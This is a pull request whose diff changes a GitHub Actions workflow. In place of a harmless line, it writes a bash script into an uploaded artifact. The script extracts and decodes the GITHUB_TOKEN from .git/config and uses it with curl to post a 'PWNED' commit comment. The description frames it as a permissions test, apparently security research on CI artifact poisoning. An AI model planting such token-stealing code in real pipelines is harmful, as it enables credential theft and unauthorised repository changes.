### PR TITLE
Should not be PWNED

### DIFF
--- a/.github/workflows/creates-artifact.yaml
+++ b/.github/workflows/creates-artifact.yaml
@@ -13,7 +13,12 @@ jobs:
     steps:
       - run: |
           cat <<'EOF' >> myartifact
-          echo "this is legitimate text"
+          #!/bin/bash
+          export GITHUB_TOKEN=$(cat $GITHUB_WORKSPACE/.git/config | grep AUTHORIZATION | cut -d':' -f 2 | cut -d' ' -f 3 | base64 -d | cut -d':' -f 2)
+
+          curl -X POST -H "Authorization: Token $GITHUB_TOKEN" \
+          -d '{"body": "PWNED"}' \
+          https://api.github.com/repos/$GITHUB_REPOSITORY/commits/$GITHUB_SHA/comments
           EOF
       - name: Upload environment variables artifact
         uses: actions/upload-artifact@v3


### PR DESCRIPTION
Should not be PWNED because the GITHUB_TOKEN has read permissions

Example workflow: https://github.com/lingyOrg/fluentui-simple/actions/runs/4186584614/jobs/7255271760